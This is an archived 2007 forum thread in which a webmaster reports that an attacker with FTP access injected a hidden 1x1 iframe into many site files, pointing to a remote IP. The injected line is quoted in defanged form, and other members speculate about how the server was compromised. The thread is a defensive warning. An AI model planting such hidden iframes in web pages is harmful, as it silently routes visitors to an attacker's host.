vb.org Archive - Webmasters Beware!

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)

- - Webmasters Beware! (https://vborg.vbsupport.ru/showthread.php?t=158706)

JD45	09-25-2007 05:49 AM

Webmasters Beware!

Recently we noticed a full screen LG ad on our website. We only run Tribal Fusion and IntelliTxt and neither of those should be displaying a full screen ad.

We looked in to it and this code was added to MANY of our php and html files:

Code:

<.iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'><./iframe>

The IP that illegal accessed our FTP is: 81.95.149.75

That IP comes back registered to Panama. I've already sent the abuse email a letter with proof. It appears we were somehow exploited and a mass script ran adding the code at the bottom of the files affected.

Just FYI for all.

manilodisan

09-25-2007 08:19 AM

How did it accessed your files? Can you share the story?

SEOvB

09-25-2007 02:36 PM

Obvisously his server was comprimised due to a exploit in some software being ran.

JD45	09-25-2007 02:56 PM

Quote:

Originally Posted by FRDS (Post 1346819)

Obvisously his server was comprimised due to a exploit in some software being ran.

exactly

SEOvB

09-25-2007 03:44 PM

Just wondering what all software besides vBulletin are you currently running?

JD45	09-25-2007 05:05 PM

Quote:

Originally Posted by FRDS (Post 1346880)

Just wondering what all software besides vBulletin are you currently running?

No other 'official' software or scripts. Our entire site besides vb is custom coded in php. Actually I take that back, we do run vbseo as well.

It doesn't seem as if it was directed to the forums, but more so PHP overall.

Marco van Herwaarden

09-25-2007 05:15 PM

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.

JD45	09-25-2007 05:51 PM

Quote:

Originally Posted by Marco van Herwaarden (Post 1346942)

Most likely they had FTP or Shell access to your server, or you are on a badly secured shared server and the files where changed from another account on the same server.

We're on a dedi server, but having ftp/shell access is a possibility.

I have to say it was pretty unique. First time I've seen anyone access a site and modify php files for a monetary gain.

Marco van Herwaarden

09-25-2007 06:17 PM

That happens all the time.

"Hackers" are not anymore what they used to be (just hacking for the thrill/kick). Hacks and exploits are being sold these days for commercial purposes.

All times are GMT. The time now is 07:19 AM.

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01021 seconds Memory Usage 1,733KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)bbcode_code_printable (3)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_navbar_search (1)printthread (9)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: